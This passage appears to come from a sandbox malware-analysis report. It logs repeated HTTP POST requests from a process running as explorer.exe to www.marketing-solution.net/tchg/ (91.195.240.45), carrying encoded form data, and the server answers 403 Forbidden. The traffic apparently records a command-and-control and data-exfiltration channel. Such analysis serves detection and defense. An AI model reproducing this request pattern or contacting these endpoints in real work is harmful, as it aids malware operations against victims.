                                                                                                                    Origin: http://www.marketing-solution.net
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.marketing-solution.net/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 59 6a 57 74 75 6c 67 6b 50 46 69 4e 44 63 6e 54 4e 76 6e 54 48 37 75 44 62 75 56 45 67 45 31 65 69 36 6b 44 30 51 48 6b 42 44 76 70 49 72 65 5a 6b 41 4b 54 61 31 4b 4d 7a 6e 54 6a 70 44 6c 71 7e 59 4b 61 4e 6e 6c 63 65 4a 58 44 4b 6d 74 31 33 4b 66 79 32 47 45 37 5a 57 38 71 7a 55 49 6b 4c 6c 31 31 41 43 41 33 72 50 35 38 56 51 7a 51 73 77 4e 6a 78 76 7a 73 30 58 57 61 61 54 78 70 5a 48 78 7a 75 59 52 62 53 56 36 45 41 4d 56 64 43 6b 7e 47 28 4f 4b 50 61 58 55 33 72 64 71 49 79 4f 4a 41 76 67 4b 47 6b 66 34 4a 59 4e 47 6b 59 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=YjWtulgkPFiNDcnTNvnTH7uDbuVEgE1ei6kD0QHkBDvpIreZkAKTa1KMznTjpDlq~YKaNnlceJXDKmt13Kfy2GE7ZW8qzUIkLl11ACA3rP58VQzQswNjxvzs0XWaaTxpZHxzuYRbSV6EAMVdCk~G(OKPaXU3rdqIyOJAvgKGkf4JYNGkYw).
                                                                                                                    May 30, 2023 11:11:51.600084066 CEST1290INHTTP/1.1 403 Forbidden
                                                                                                                    date: Tue, 30 May 2023 09:11:51 GMT
                                                                                                                    content-type: text/html
                                                                                                                    transfer-encoding: chunked
                                                                                                                    vary: Accept-Encoding
                                                                                                                    server: NginX
                                                                                                                    content-encoding: gzip
                                                                                                                    connection: close
                                                                                                                    Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    69192.168.11.204982891.195.240.4580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:11:54.119678020 CEST1292OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.marketing-solution.net
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.marketing-solution.net
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.marketing-solution.net/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 59 6a 57 74 75 6c 67 6b 50 46 69 4e 52 74 33 54 50 4d 28 54 43 62 75 41 55 4f 56 45 76 6b 31 53 69 36 67 44 30 52 44 4f 42 78 4c 70 49 4b 75 5a 6c 42 4b 54 55 56 4b 4d 34 48 54 36 30 7a 6c 6a 7e 59 48 70 4e 69 46 63 65 4a 44 44 59 6e 4e 31 6d 71 66 31 69 57 45 38 4a 47 38 72 34 30 49 36 4c 6c 35 54 41 41 38 33 72 2d 56 38 57 53 72 51 6f 69 31 6b 30 50 7a 75 68 48 57 5a 54 7a 78 4f 5a 48 74 52 75 5a 70 6c 53 6a 4b 45 41 73 31 64 44 6b 7e 46 33 2d 4b 45 55 48 56 6a 73 34 48 73 39 5f 5a 30 75 46 47 70 6c 37 52 67 52 76 62 4c 46 41 51 55 50 35 4c 6a 69 4c 31 67 50 44 6d 4c 70 37 61 45 78 41 73 6d 42 58 50 33 4e 42 7a 35 78 66 37 7a 50 32 47 71 79 47 43 56 6b 4a 66 38 48 6a 52 38 78 76 74 63 6b 56 6c 6b 78 31 4e 67 46 51 59 4d 39 57 62 53 72 6a 65 67 34 53 53 44 37 53 54 4c 6e 75 4b 33 69 32 4f 53 61 47 28 67 4d 34 6e 52 73 4d 76 45 49 55 50 35 44 36 70 46 7e 6d 38 68 4c 61 55 7a 31 6c 64 59 7e 66 6d 73 78 5a 28 2d 63 52 37 34 4f 42 45 4b 74 75 77 4a 76 70 4b 75 7a 64 73 36 58 5f 30 56 43 44 30 57 4d 78 52 4b 47 6e 69 56 73 67 55 59 49 52 39 6b 50 6c 31 43 31 67 4e 58 58 62 48 74 69 76 7e 4d 56 63 74 4e 72 5f 4c 34 30 4d 4f 33 72 37 59 6c 50 35 4e 65 5a 56 68 72 56 36 77 6f 5a 4d 67 6f 28 38 75 5f 78 50 6e 33 59 54 66 5a 52 42 7e 45 4c 75 48 50 47 70 77 6b 79 61 51 38 31 5a 38 70 41 47 63 51 46 77 43 66 67 74 4c 4f 6d 49 64 64 4d 61 4b 6f 49 6e 6d 2d 75 75 61 78 38 4a 69 37 45 50 30 4e 50 4a 44 64 69 35 78 6a 56 44 76 34 5a 61 55 46 45 62 4f 42 7e 55 56 46 7e 59 55 49 4b 30 46 58 59 65 30 69 4a 69 7a 4a 68 46 32 5f 6f 6f 37 6a 47 79 73 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=YjWtulgkPFiNRt3TPM(TCbuAUOVEvk1Si6gD0RDOBxLpIKuZlBKTUVKM4HT60zlj~YHpNiFceJDDYnN1mqf1iWE8JG8r40I6Ll5TAA83r-V8WSrQoi1k0PzuhHWZTzxOZHtRuZplSjKEAs1dDk~F3-KEUHVjs4Hs9_Z0uFGpl7RgRvbLFAQUP5LjiL1gPDmLp7aExAsmBXP3NBz5xf7zP2GqyGCVkJf8HjR8xvtckVlkx1NgFQYM9WbSrjeg4SSD7STLnuK3i2OSaG(gM4nRsMvEIUP5D6pF~m8hLaUz1ldY~fmsxZ(-cR74OBEKtuwJvpKuzds6X_0VCD0WMxRKGniVsgUYIR9kPl1C1gNXXbHtiv~MVctNr_L40MO3r7YlP5NeZVhrV6woZMgo(8u_xPn3YTfZRB~ELuHPGpwkyaQ81Z8pAGcQFwCfgtLOmIddMaKoInm-uuax8Ji7EP0NPJDdi5xjVDv4ZaUFEbOB~UVF~YUIK0FXYe0iJizJhF2_oo7jGys.
                                                                                                                    May 30, 2023 11:11:54.131275892 CEST1292INHTTP/1.1 403 Forbidden
                                                                                                                    date: Tue, 30 May 2023 09:11:54 GMT
                                                                                                                    content-type: text/html
                                                                                                                    transfer-encoding: chunked
                                                                                                                    vary: Accept-Encoding
                                                                                                                    server: NginX
                                                                                                                    content-encoding: gzip
                                                                                                                    connection: close
                                                                                                                    Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    7192.168.11.204976691.195.240.4580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:08:21.980484962 CEST335OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.marketing-solution.net
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.marketing-solution.net
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.marketing-solution.net/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 59 6a 57 74 75 6c 67 6b 50 46 69 4e 44 63 6e 54 4e 76 6e 54 48 37 75 44 62 75 56 45 67 45 31 65 69 36 6b 44 30 51 48 6b 42 44 76 70 49 72 65 5a 6b 41 4b 54 61 31 4b 4d 7a 6e 54 6a 70 44 6c 71 7e 59 4b 61 4e 6e 6c 63 65 4a 58 44 4b 6d 74 31 33 4b 66 79 32 47 45 37 5a 57 38 71 7a 55 49 6b 4c 6c 31 31 41 43 41 33 72 50 35 38 56 51 7a 51 73 77 4e 6a 78 76 7a 73 30 58 57 61 61 54 78 70 5a 48 78 7a 75 59 52 62 53 56 36 45 41 4d 56 64 43 6b 7e 47 28 4f 4b 50 61 58 55 33 72 64 71 49 79 4f 4a 41 76 67 4b 47 6b 66 34 4a 59 4e 47 6b 59 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=YjWtulgkPFiNDcnTNvnTH7uDbuVEgE1ei6kD0QHkBDvpIreZkAKTa1KMznTjpDlq~YKaNnlceJXDKmt13Kfy2GE7ZW8qzUIkLl11ACA3rP58VQzQswNjxvzs0XWaaTxpZHxzuYRbSV6EAMVdCk~G(OKPaXU3rdqIyOJAvgKGkf4JYNGkYw).
                                                                                                                    May 30, 2023 11:08:21.996994972 CEST335INHTTP/1.1 403 Forbidden
                                                                                                                    date: Tue, 30 May 2023 09:08:21 GMT
                                                                                                                    content-type: text/html
                                                                                                                    transfer-encoding: chunked
                                                                                                                    vary: Accept-Encoding
                                                                                                                    server: NginX
                                                                                                                    content-encoding: gzip
                                                                                                                    connection: close
                                                                                                                    Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    70192.168.11.204982991.195.240.4580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:11:56.650516033 CEST1305OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.marketing-solution.net
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.marketing-solution.net
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.marketing-solution.net/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 59 6a 57 74 75 6c 67 6b 50 46 69 4e 52 74 33 54 50 4d 28 54 43 62 75 41 55 4f 56 45 76 6b 31 53 69 36 67 44 30 52 44 4f 42 78 44 70 4a 34 57 5a 6b 6a 69 54 56 56 4b 4d 78 6e 54 5f 30 7a 6b 7a 7e 59 66 32 4e 69 41 70 65 4c 37 44 59 55 46 31 6d 34 48 31 70 32 45 39 4d 47 38 6c 7a 55 49 75 4c 6c 31 48 41 42 59 34 72 50 68 38 56 51 6a 51 73 54 31 6a 36 5f 7a 73 68 48 57 56 58 7a 78 5a 5a 48 6f 55 75 5a 6c 6c 53 68 4f 45 53 71 35 64 47 7a 43 46 7e 4f 4b 44 53 33 56 38 6e 59 48 5a 39 5f 64 42 75 46 47 66 6c 2d 78 67 52 74 44 4c 45 44 34 54 4d 5a 4c 6a 71 72 31 6a 4c 44 71 48 70 37 47 63 78 44 77 6d 42 51 37 33 58 68 7a 35 33 2d 37 79 43 47 47 73 32 47 44 4d 76 6f 69 7a 48 6a 46 6f 78 71 39 63 6c 6b 42 6b 78 43 35 67 4a 56 6b 4d 6a 47 62 55 76 6a 66 6b 32 79 53 68 37 57 33 78 6e 71 28 43 69 32 36 53 61 6a 4c 67 4b 5a 6e 51 38 38 75 50 4e 55 4f 7a 56 4b 30 52 7e 6d 73 44 4c 61 56 75 31 6e 78 59 7e 75 57 73 77 59 28 78 61 42 37 5f 46 68 45 66 6b 4f 73 31 76 74 53 6d 7a 65 38 71 58 38 59 56 51 7a 30 57 64 69 4a 46 52 48 69 53 77 51 56 42 47 78 38 6d 50 6b 4a 65 31 67 6c 68 55 72 72 74 69 66 75 4d 52 4d 74 53 76 66 4c 43 7e 73 4f 74 76 37 59 6c 50 35 41 6e 5a 56 74 72 57 4c 59 6f 57 62 6b 6f 36 76 57 5f 33 50 6e 75 59 54 65 58 52 42 7a 6b 4c 75 50 68 47 70 41 4b 79 5a 38 38 77 59 73 70 48 44 38 66 4f 67 44 30 6b 74 4c 64 35 59 52 4b 4d 61 47 67 49 6b 50 46 70 5a 71 78 39 4a 53 37 41 50 30 4b 4a 70 43 56 30 70 78 4c 52 44 6a 73 5a 61 5a 77 45 62 36 33 7e 54 68 46 37 4a 39 6c 51 45 46 67 43 63 49 5a 48 58 37 53 75 54 32 54 28 4a 33 31 51 48 44 58 5a 4b 62 43 67 44 28 77 73 6c 6e 57 6c 66 43 35 58 36 53 53 71 45 67 51 30 65 74 75 61 73 79 6c 61 36 7a 6a 61 33 28 6b 64 75 75 63 32 64 42 47 6a 6b 56 39 28 66 28 76 72 65 6b 34 76 78 67 59 51 47 68 79 66 38 79 61 32 57 62 6a 71 4d 5a 56 43 69 7a 44 6b 31 51 79 50 6a 4a 78 71 41 46 6d 39 33 49 51 78 4f 63 58 37 57 45 43 36 73 4c 32 56 30 50 66 68 5a 68 53 7e 51 59 50 28 48 77 31 42 5f 69 5a 6d 58 4e 38 6c 46 54 2d 47 33 66 7a 31 37 64 4e 6a 66 68 4b 72 36 77 58 58 45 6b 68 4f 64 79 44 31 5f 41 61 34 35 53 49 31 70 66 78 65 68 64 65 38 52 51 52 54 56 6f 6e 4e 43 48 55 69 55 4b 66 4b 46 4c 38 56 51 56 6a 70 5f 46 57 43 6b 6f 75 43 4a 37 5a 57 66 73 4b 64 72 71 57 6c 65 30 53 74 48 72 6d 43 75 77 7a 38 69 62 59 52 7a 28 2d 54 6e 79 53 34 32 69 56 61 53 44 36 59 61 39 32 4a 49 51 73 32 56 4a 4a 55 64 54 4f 42 6d 4c 71 66 52 7a 75 28 34 32 41 4e 47 69 56 78 75 49 5f 47 48 4d 44 71 4c 79 74 30 74 67 71 49 78 75 6e 4c 4a 6d 39 45 52 65 4d 58 42 63 37 65 59 35 7a 5a 4e 6e 58 47 62 63 48 7e 6b 77 32 59 78 73 48 59 49 4f 70 7e 7a 4d 49 28 4c 42 76 59 5f 52 38 6b 6e 73 50 6e 4f 73 58 56 73 4d 38 6a 62 61 54 34 71 33 44 55 4a 71 78 64 77 4f 67 38 42 73 63 65 63 7a 32 4c 70 36 5f 56 67 41 56 58 4d 37 69 71 47 4f 32 38 49 57 35 56 4c 39 43 54 41 6a 69 73 52 79 52 62 6c 36 6f 55 54 38 71 4c 63 42 62 49 41 73 78 33 59 66 2d 79 59 69 4d 4a 4a 51 68 47 43 6d 47 63 6f 56 45 38 4e 50 68 50 7a 6a 41 74 61 41 46 4e 35 37 30 67 79 46 7a 51 35 44 73 62 39 49 48 52 56 6f 49 6d 71 44 63 37 57 54 38 42 4b 6b 79 4e 46 38 5a 53 4f 6d 4a 43 59 73 44 39 75 5a 57 4e 39 49 6e 46 5f 32 4f 69 78 35 77 6b 7a 5a 30 36 70 6b 44 71 7a 31 6f 66 65 6e 58 33 6f 59 68 79 52 67 37 6b 74 33 4b 66 50 42 54 59 41 45 56 59 55 76 73 49 65 50 31 4b 4a 67 52 63 78 58 50 43 30 72 77 75 4b 61 42 38 76 6b 69 73 6d 4e 6a 76 6b 51 73 42 54 72 73 71 76 47 50 4e 49 5a 35 62 50 54 64 63 68 4f 4a 48 32 7e 51 4f 75 68 6e 42 63 78 64 75 57 59 4d 4c 37 70 4b 39 4b 72 6a 7e 30 35 42 70 66 4e 55 33 45 58 4e 77 6f 74 54 59 32 58 4c 66 75 41 49 71 63 52 70 49 50 66 6c 42 50 37 65 41 39 51 71 7e 49 7a 51 52 6c 76 49 38 41 54 50 47 52 58 79 50 6e 4d 6d 6d 58 36 70 57 48 39 6a 79 6b 51 6a 68 58 5a 75 63 48 4a 57 38 4a 34 37 61 30 56 50 7e 59 52 41 7e 6e 75 78 48 38 76 55 39 41 4a 41 76 79 42 6b 44 44 6f 4b 79 75 66 55 78 49 6f 47 37 67 55 74 50 6e 38 73 41 53 62 41 51 44 5a 4f 58 5a 79 5f 4f 34 38 53 6f 64 31 54 70 46 4f 50 51 53 6f 35 45 45 6b 56 77 30 6a 37 50 44 41 49 56 69 7e 53 7e 76 46 45 6f 36 71 6e 50 36 4c 79 75 4a 36 75 7e
                                                                                                                    Data Ascii: O0qEM=YjWtulgkPFiNRt3TPM(TCbuAUOVEvk1Si6gD0RDOBxDpJ4WZkjiTVVKMxnT_0zkz~Yf2NiApeL7DYUF1m4H1p2E9MG8lzUIuLl1HABY4rPh8VQjQsT1j6_zshHWVXzxZZHoUuZllShOESq5dGzCF~OKDS3V8nYHZ9_dBuFGfl-xgRtDLED4TMZLjqr1jLDqHp7GcxDwmBQ73Xhz53-7yCGGs2GDMvoizHjFoxq9clkBkxC5gJVkMjGbUvjfk2ySh7W3xnq(Ci26SajLgKZnQ88uPNUOzVK0R~msDLaVu1nxY~uWswY(xaB7_FhEfkOs1vtSmze8qX8YVQz0WdiJFRHiSwQVBGx8mPkJe1glhUrrtifuMRMtSvfLC~sOtv7YlP5AnZVtrWLYoWbko6vW_3PnuYTeXRBzkLuPhGpAKyZ88wYspHD8fOgD0ktLd5YRKMaGgIkPFpZqx9JS7AP0KJpCV0pxLRDjsZaZwEb63~ThF7J9lQEFgCcIZHX7SuT2T(J31QHDXZKbCgD(wslnWlfC5X6SSqEgQ0etuasyla6zja3(kduuc2dBGjkV9(f(vrek4vxgYQGhyf8ya2WbjqMZVCizDk1QyPjJxqAFm93IQxOcX7WEC6sL2V0PfhZhS~QYP(Hw1B_iZmXN8lFT-G3fz17dNjfhKr6wXXEkhOdyD1_Aa45SI1pfxehde8RQRTVonNCHUiUKfKFL8VQVjp_FWCkouCJ7ZWfsKdrqWle0StHrmCuwz8ibYRz(-TnyS42iVaSD6Ya92JIQs2VJJUdTOBmLqfRzu(42ANGiVxuI_GHMDqLyt0tgqIxunLJm9EReMXBc7eY5zZNnXGbcH~kw2YxsHYIOp~zMI(LBvY_R8knsPnOsXVsM8jbaT4q3DUJqxdwOg8Bscecz2Lp6_VgAVXM7iqGO28IW5VL9CTAjisRyRbl6oUT8qLcBbIAsx3Yf-yYiMJJQhGCmGcoVE8NPhPzjAtaAFN570gyFzQ5Dsb9IHRVoImqDc7WT8BKkyNF8ZSOmJCYsD9uZWN9InF_2Oix5wkzZ06pkDqz1ofenX3oYhyRg7kt3KfPBTYAEVYUvsIeP1KJgRcxXPC0rwuKaB8vkismNjvkQsBTrsqvGPNIZ5bPTdchOJH2~QOuhnBcxduWYML7pK9Krj~05BpfNU3EXNwotTY2XLfuAIqcRpIPflBP7eA9Qq~IzQRlvI8ATPGRXyPnMmmX6pWH9jykQjhXZucHJW8J47a0VP~YRA~nuxH8vU9AJAvyBkDDoKyufUxIoG7gUtPn8sASbAQDZOXZy_O48Sod1TpFOPQSo5EEkVw0j7PDAIVi~S~vFEo6qnP6LyuJ6u~PenkeC02HyZrzsvzT6MPEAnttsGmPjTBvZpjShkWpPjH7lDUtK0xPqclTJXr_SO9JCwYpy599LLgzsV1-80O9FNa56_bez0N8BPg_0tm9f7RqWvdHLFXFo_KAYBVxZ70j9uHaVEj3QVkoRWA107pcrcCdTaN4odSWrxNoXTpJ0_P_qnG92CgH0TfhLpZWxA6YPVYsgDxfjJ26b_XJpFR0~cQfvKcTkiZAvoqaoMVNdA4zsXsEhkDJSadcjxe4gx6keYQIj73caukVoemefMwouusxqXLSivNoOF(8wC1i~SiZ07fzfWY4nSMKq5YiHykfqxv8JJ9BSQBiBEugZr1agA~i~mfHHk5WJFd7jGhwZFO2A_y58vKM7bbWBTgtBtdTrgiHWY53vnZFCF7_y_D_wC6zDw3eqEN-jkKjN1xxBBMx42D1l_VyMuwYrZROBVibDM51er0teZZb2UXz6ARKlVVWhYbyOYU6jx4CIZZwZLkMjoUmN4h7uDygpJBSRTh9WGb5vPw3HxkOI51xawOUvRY_(NIkiVk9ZDVAWFJEEZv9JGZMUtRrC7VYSZ9NVJbRZP7iKJ291fjbgXaDVBnkMOvhho4D50AMBGiZl2EToraQUeAD0p4dvrhZvlQFUJB7sPKRdeqRHy6SWWTvLKv0KugS9xw9UUm2Ku0iGbM_(fZLpQywX_WIG76MulsGab(rS6ZpjpYTAKo6G4iAU2MEujKpt_TPu3(YYVVTwxpp2yqFL1YJRZAo9FYZi9D9Z-1XzUMD3MdAw5t9TCNdgsMaAqYLuykakVWWN6vxhnXGh-CP8FlHS8YuznOmxjmfZhre74Ol~LCGOiLys30qnvLzRIQff2aC(wG77FqWJYq1mMO_IJColqvU83NNBr2Yru1wA-2DDRPvxF(9XRoDPPHPhw69OQIKxBFGf6hQXNs923HBxiaKGDg59ydb04slG67B1oyOoTUA2_dvgIEIgm5g16fgPTtS5KovMSqBCbjTL7C69oezAiMJ(_unCobjnZ2VHOD30mUHPVTxOh4nIZA-7XCps2WSzlniLkIeBAgrW58iAlMOA0yYpV7e6Q~GAnP8vDy178YLbJ2Nvzsu3r35FaeKVDUJW4Rl5SczxVnYFPIILTo30GSaFHX_divsUUNXXvcvVZukAlRDU61oTLNR(5ZoDYldYNC6LkpnDlX-GJdvl7J42WWnNLdk1JUq2CmNmnU4ZY(1A3UZzE3mfBD4(frjEVx1SFOMdFfdGI1aU5IcY8T-unaeEPDPEF(9JUbSbtaTIR8fxfTjiJ9XHndAQzDynLjo~JFZZdncClLtFMArrixePQDO0fMKClMqGa~PHj~PemLikSpLLaVRMGG2j3Fgt0idt8iJnluVw01eZ9x4swCEZfbaj6zKnM6ieNH0hUTh0lfWcspP1EvSId0qd5roKWKdVpj0pcxgvqw7(C30LSG4Hd04k716(h2p4G4XgfUN~fRwC19H14WhgWxuXCYZDYxsVNKT38HCHztU35uTAX9UAB6D8n9Jm3cXENzs4-KfSFJcMkF0rdmPv7BFQl0TA9IZjn(Ki7LO72qFmNJEyX7PoMX0a9dL7SO8OsD50bWrw_Pr4yKNH65lrMtxRiuoirMEswdLqIGFQS8zbdEmBb7zznuIh7hYztWUZIu2KK4834mm8KeYDDx7MSiKM_oqrRnWea5xTwuQJnwGEfQCXZRnbLbHuoUxpivnNz~vHdhD(KaA7aoWaQDt(WeAwfPTed0rQgtEedUyVVSdKS2oDAvD6tg_KMQw(FSbqHHgUupn4TP-XBB2Nnl62BThVhpHh0PpgUvk8QbNXweNgpcOU7(WK9y_QND04NHvBwSnUyMRwuI1rZhSmXOvy5iJAR41IY(3kfl2reRrnVKkrZ~u4tLoLmCeaU3Q3Bqzv6qw4WH5vhtLMY7HD7QQEwfltIoHf6NIot1VUEU-iaNN9j7MktgEKbwpWT~qvdf9MnntAKEL7fkO8VuRqSYwtf7JHhRIcqqDyvxq6jEzddN8xChJV-44oX19ZEoO1HOsrm2XeohmoEtIDI4CsYpYDoeg~-x0uhxHr_aynYEdLR2yatzqHWKOkTBZGxvdPQLs1gsyIXoEcj9WRpf4pccb2DZyjI5MdAqtPHUaZUTANQGllABAIB6rMbhUs1W0Al34NVR10203Tt54oz~5ttGeiMSpvmbT70bPhLjsM5zsDH7J9nsQwH5yiXjI5-pujXl4vCafipzxvThlomAGImZgeR6bECezjVHYodzQu51u686GngMoN1cwDw0TQKmjdSb7xWKavsIoJ3DR342uS-6mvLHG2MWZHOt7JEtMONu5srCp3nUakGiZRZo7g8cmA6ROxz1jkHQbd1F8Q-dvoYrbPDfXLF8PhQR3kORZUpUYTQRHnyeVIzKeaNWpbU9Xg0z2x5m2X0ymgG7KbtF5xgM-7S2ifnK2rZvD2ZbK6VlZKnx-n7n8(Tzqt9wgsg1mZvbkV7bItFVEk-soumsFTFEGmkVKsH457ejf402RkGVunkrs71UFsE7Xg-HuqaCgey7X~q(hIXc5iSZ3QjW88FIrdOlXnVf6nGQFwXk3NgIGezvhYgymFQzog1VOhxnbtD(SwPmbb4r5~2(98wA5VwFLxN6Ay7NGeAgVeXV6M0NZXJ0s0vDeB2UVpUdLx9ZYPblKCvrAOvR-yInebymzXka40SgIja~vMdWkVRc33N
                                                                                                                    May 30, 2023 11:11:56.661372900 CEST1306OUTData Raw: 7e 38 66 75 68 77 51 51 74 51 65 5a 61 6e 6b 6a 6b 34 49 68 41 67 6b 4c 33 4c 37 55 33 7a 31 72 67 30 28 4b 32 71 4d 58 4b 77 32 71 72 5a 76 70 48 4b 71 6f 50 76 55 45 44 30 77 2d 32 51 67 58 54 48 62 6c 67 64 36 33 75 38 55 32 6d 63 78 65 43 31
                                                                                                                    Data Ascii: ~8fuhwQQtQeZankjk4IhAgkL3L7U3z1rg0(K2qMXKw2qrZvpHKqoPvUED0w-2QgXTHblgd63u8U2mcxeC1cFD6gAOs2gQjvC~QzwLPouhE0P6CDB7rxip3wsuPTAgbWALDPD7rjyLGAfRF5Ac9sWYUtwVcxgTxx1jwRb5rExRAlsNoxeWv3L7azua-N1Y-ByYdOE~Vj0VGKBZGiQx7oMnPj9tuYUPVmaXCJUyptBkYuo5O32vY3
                                                                                                                    May 30, 2023 11:11:56.661446095 CEST1308OUTData Raw: 30 4f 78 61 77 42 63 4d 57 46 55 6c 4c 5a 72 72 6f 43 4c 59 66 32 50 37 6c 72 38 46 76 65 57 63 79 6a 71 48 52 34 6e 4d 45 78 73 7a 6a 59 6d 73 44 30 6c 51 6a 4e 57 5f 6b 56 66 4c 77 4e 6b 47 4e 68 74 6b 61 6f 63 4a 75 4e 43 6b 39 53 6f 52 4e 32
                                                                                                                    Data Ascii: 0OxawBcMWFUlLZrroCLYf2P7lr8FveWcyjqHR4nMExszjYmsD0lQjNW_kVfLwNkGNhtkaocJuNCk9SoRN2wrvVUnAXu6lYqDoddY8lwbc88QFJH-lLtm8pOA4aCD5_bFeB0TueCRqFLAOGY5SNfXuNargFiQeXlmqf5NqPeshl0BAs0Nlm7ZtTGe3FaqtXB0XyPKx7UmhneA3Dkm4K04Qiki~TKgw3BXcV08PudtGhWi0HaZVp0
                                                                                                                    May 30, 2023 11:11:56.661509991 CEST1310OUTData Raw: 4e 56 47 56 67 35 47 4a 37 61 75 47 71 31 31 45 34 4e 43 58 6f 63 70 57 55 75 63 69 53 71 6b 35 42 31 4e 48 76 5f 30 70 78 30 56 58 68 54 48 6b 64 61 53 2d 71 72 52 61 48 6f 72 56 75 4a 64 65 77 5a 56 41 76 47 4d 44 74 76 4a 72 55 49 6c 76 76 4f
                                                                                                                    Data Ascii: NVGVg5GJ7auGq11E4NCXocpWUuciSqk5B1NHv_0px0VXhTHkdaS-qrRaHorVuJdewZVAvGMDtvJrUIlvvO7Qn2iCdKK-TdQBjMEatZa_QOpRPsUmeEnWn4eXK24NrZKYry0FUgXW6irsnw(NMRYyO4LZkooRlUNMN8GSVVzFCLprzlnFCEXcKZZ223O0UR3ZDlF431PyJPAH73BygYxY9XCG1_UY1T(1Skd3mIbAzsx3lYbldW7
                                                                                                                    May 30, 2023 11:11:56.661643028 CEST1319OUTData Raw: 58 52 63 48 69 62 45 56 79 50 30 4b 35 5a 77 4c 57 4c 6c 54 7a 32 77 74 6a 55 6c 6c 51 74 46 73 75 30 6d 6c 4e 4c 49 39 42 4e 63 41 59 76 6c 68 57 39 4d 6f 58 38 73 68 70 61 55 75 48 4c 28 55 61 62 63 76 75 4b 44 5f 55 46 4f 70 35 67 46 33 33 46
